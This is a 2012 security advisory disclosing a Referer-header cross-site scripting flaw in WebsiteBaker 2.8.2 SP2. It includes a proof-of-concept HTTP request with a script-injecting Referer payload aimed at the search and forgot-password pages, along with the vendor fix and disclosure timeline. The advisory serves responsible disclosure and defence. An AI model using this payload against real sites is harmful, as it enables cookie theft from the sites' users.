WebsiteBaker 2.8.2 Cross Site Scripting

`Advisory: WebsiteBaker 2.8.2 SP2 HTTP-Referer XSS vulnerability  
Advisory ID: SSCHADV2012-003  
Author: Stefan Schurtz  
Affected Software: Successfully tested on WebsiteBaker 2.8.2 SP2  
Vendor URL: www.websitebaker2.org  
Vendor Status: fixed   
  
==========================  
Vulnerability Description  
==========================  
  
HTTP-Referer in WebsiteBaker 2.8.2 SP2 is prone to a XSS vulnerability  
  
==================  
PoC-Exploit  
==================  
  
http://[target]/wb/search/index.php  
http://[target]/wb/account/forgot.php  
  
Host: [target]  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Connection: keep-alive  
Referer: '"/><script>alert(document.cookie)</script>  
  
=========  
Solution  
=========  
  
Upgrade to WebsiteBaker 2.8.3   
  
====================  
Disclosure Timeline  
====================  
  
31-Jan-2012 - vendor informed  
31-Jan-2012 - release date of this security advisory  
13-Feb-2012 - fixed by vendor   
  
========  
Credits  
========  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-003.txt  
`